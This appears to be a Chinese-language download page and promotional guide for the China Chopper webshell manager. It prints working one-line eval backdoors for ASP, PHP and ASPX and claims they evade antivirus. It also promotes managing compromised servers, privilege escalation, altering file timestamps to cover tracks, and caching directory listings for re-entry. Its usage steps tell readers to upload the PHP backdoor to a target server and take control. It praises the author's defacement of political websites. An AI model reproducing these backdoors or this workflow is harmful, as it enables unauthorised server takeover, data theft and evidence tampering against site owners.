中國菜刀 (chopper)  是國內(nèi)牛人開發(fā)的方便的檢測后門是否可以利用，方便站長做網(wǎng)站安全檢測。最近有好心的朋友提供了我們的一些不維護(hù)網(wǎng)站的存在注入問題的幾個(gè)頁面，正好用這個(gè)工具檢測了下， 要不是服務(wù)器安全設(shè)置好了， 否則什么都是別人的了。

解壓密碼：okjb51

如果你是站長，你還在用FTP來管理你的網(wǎng)站嗎？
為什么不試一下“中國菜刀”呢，這是一款專業(yè)的網(wǎng)站管理工具。
用途廣泛，使用方便，小巧實(shí)用。
同時(shí)，還能連接管理幾乎所有主流的數(shù)據(jù)庫。
支持的網(wǎng)站腳本有：PHP，ASP.NET，ASP, 后續(xù)將支持其它網(wǎng)站腳本的連接管理。
其它功能：WEB瀏覽器(POST瀏覽/自定義COOKIE瀏覽/自定義JS),網(wǎng)站爬行(自動(dòng)保存目錄結(jié)構(gòu))，WEB安全掃描。
在非簡體中文環(huán)境下使用，自動(dòng)切換到英文界面。

說起菜刀，就不得不提起菜刀的作者，作者是一個(gè)退伍軍人，生長在一個(gè)貧窮的農(nóng)村，據(jù)說初中也沒讀完，英語更是不咋地，但他卻自學(xué)掌握了
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand等等，當(dāng)初在六七年前臺(tái)灣鬧獨(dú)立的時(shí)候，他在國民黨和民進(jìn)黨的網(wǎng)站上留下了“只有一個(gè)中國”的黑頁，一舉成名。
作者是一個(gè)樸實(shí)，低調(diào)的技術(shù)牛人，他這些年留下的作品很多，中國菜刀是他最新的一個(gè)作品，從他之前的作品WEBSHELL管理器的基礎(chǔ)上修改而來，功能更加的強(qiáng)大。
你見過很強(qiáng)大的ASP后門，很強(qiáng)大的PHP后門，很強(qiáng)大的ASPX后門，那你見過很強(qiáng)大的asp,aspx,php三合一后門么........，沒有吧，尤其是這個(gè)后門，只有一句話。
Asp環(huán)境：<%eval request("a")%>
Php環(huán)境：<?php @eval($_POST['a']);?>
Aspx環(huán)境：<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

是不是很震憾，很不可思議，是的，我剛接觸的時(shí)候，也是這樣的想法，就這三句話，一個(gè)名不見經(jīng)傳的“中國菜刀”，就可以代替我那搜集了幾年，大大小小幾百個(gè)多種平臺(tái)多種環(huán)境的腳本后門？，事實(shí)證明，我錯(cuò)了，原來“中國菜刀”不僅僅可以代替那些后門，而且他的功能超出我的想象，就讓我慢慢說明吧。
1.就從最基本的講起，你的腳本是不是經(jīng)常被殺，你怎么變形都被殺，，傳到服務(wù)器被殺導(dǎo)致被管理員發(fā)現(xiàn)，結(jié)果你的權(quán)限就沒了，殺到你欲哭無淚。菜刀的一句話后門，可以避免這個(gè)問題，只有短短的一行代碼，永遠(yuǎn)不會(huì)被查殺。
2.你是不是很郁悶?zāi)愕暮箝T傳到服務(wù)器上連他媽都不認(rèn)識(shí)了，框架變形，字體變框框，點(diǎn)擊菜單無效，這個(gè)是因?yàn)橄到y(tǒng)語言不兼容造成的，菜刀是UINCODE方式編譯,支持多國語言輸入顯示,完全不存在兼容性問題。
3.你是不是有很多webshell，你每次都拿記事本記下來，需要的時(shí)候，又去翻半天，弄得你很累很沒脾氣。有了“菜刀”，你可以很方便管理你的webshell，所有的記錄都保存在加密的本地?cái)?shù)據(jù)庫里，而且支持webshell分類，讓你管理得井井有條。菜刀不僅有臨時(shí)鎖定功能，方便你離開電腦的那小會(huì)時(shí)間不被別人偷你的webshell，也有加密功能，不輸對(duì)密碼，HOHO，偷了你的數(shù)據(jù)也沒用。
4.再來說說數(shù)據(jù)庫管理，這個(gè)是菜刀最最強(qiáng)大的功能，精通各平臺(tái)主流數(shù)據(jù)庫的作者，把這個(gè)功能寫的是淋漓盡致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等數(shù)據(jù)庫，支持不是最主要的，功能強(qiáng)大，人性化才是最主要的，“菜刀”的數(shù)據(jù)庫操作界面，內(nèi)置了常用的數(shù)據(jù)庫語句，非常直觀的表列名瀏覽功能，自動(dòng)顯示表名，列名，查詢語句，非常人性化的設(shè)計(jì)，更內(nèi)置了不少自建的函數(shù)，方便不懂?dāng)?shù)據(jù)庫的菜鳥，都能查閱數(shù)據(jù)庫里的數(shù)據(jù)，再說個(gè)“菜刀”數(shù)據(jù)庫管理的一個(gè)小技巧，對(duì)于access數(shù)據(jù)庫，可以在菜刀的webshell操作界面，對(duì)著MDB文件點(diǎn)右鍵，點(diǎn)Access Management，就直接進(jìn)入Access的數(shù)據(jù)庫操作界面了，方便吧，嘿嘿??！
5.再說說提權(quán)這塊，webshell的提權(quán)總是最讓人關(guān)心的，說到提權(quán)，就不能說到webshell上的cmd執(zhí)行了，有些朋友并不了解菜刀的自定義CMD路徑功能，有兩種方法可以設(shè)置指定的cmd路徑，一就是在cmd操作界面，輸入setp d:\cmd.exe，就可以了，或者把cmd.exe上傳到目錄，然后點(diǎn)右鍵,點(diǎn)virtual terminal file，就可以進(jìn)入自定義CMD.EXE路徑的命令行了，同樣的，再給個(gè)cmd使用的小技巧，在菜刀的命令行里，可以使用cd等命令跳轉(zhuǎn)目錄，方便吧，嘿嘿！！嗯，另外，新版菜刀新增常用目錄管理功能，你可以把你常用的目錄或者提權(quán)的目錄加進(jìn)菜刀里，這樣很方便你提權(quán)或者日常工作，是不是比那些固定了提權(quán)目錄的腳本后門要牛B的多啊，哈哈。
6.還有菜刀的webshell上的文件功能功能，也是非常人性化的，文件夾和文件的圖標(biāo)完全模枋windows,，文件日期，文件大小，文件權(quán)限，一目了然，尤其是修改文件時(shí)間功能，非常的方便，直接對(duì)著要修改時(shí)間的文件點(diǎn)右鍵,modify the file time，然后在文件的時(shí)間那欄，輸入時(shí)間，回車，就修改完了。當(dāng)然，菜刀的文件管理還有新建，刪除，上傳，下載，編輯功能，這些大同小異，就不一一細(xì)說了。不過有個(gè)功能，還是要重點(diǎn)說明的，那就是目錄緩存功能，菜刀可以把瀏覽過的webshell目錄都緩存在本地，這樣可以方便下次訪問的時(shí)候更加快捷，最重要的是，當(dāng)哪天你的權(quán)限丟了，起碼你還有對(duì)方服務(wù)器的文件目錄結(jié)構(gòu)，方便再一次滲透。
說完大家都有的腳本后門功能，現(xiàn)在來說點(diǎn)特別的菜刀功能，非常特別跟實(shí)用的哦。菜刀的前身是WEBSHELL管理器，再結(jié)合了作者之前的web管理軟件等幾個(gè)工具的優(yōu)點(diǎn)，實(shí)在是大殺器的集合體。

使用方法

這里以php為例
首先我們先將php一句話木馬上傳到目標(biāo)服務(wù)器中，用菜刀去嘗試連接

在地址中填寫上傳一句話木馬的地址，在后面的方框中填寫所要連接的參數(shù)（也就是代碼中的’x’）

打開菜刀，空白處右鍵添加

設(shè)置好后我們雙擊點(diǎn)開

填入地址、密碼 等參數(shù)

添加完成之后就可以對(duì)目標(biāo)服務(wù)器進(jìn)行控制，可以對(duì)文件進(jìn)行相關(guān)的操作，也可以對(duì)數(shù)據(jù)庫進(jìn)行操作，也可以創(chuàng)建一個(gè)用戶。

我們將a.txt刪除，然后去服務(wù)器上查看，發(fā)現(xiàn)服務(wù)器上的a.txt文件也被刪除了，這就是利用了上傳漏洞進(jìn)行攻擊。

更新日志

最新版本1.5，官方已經(jīng)無法訪問，建議再虛擬機(jī)中執(zhí)行，以防止有后門。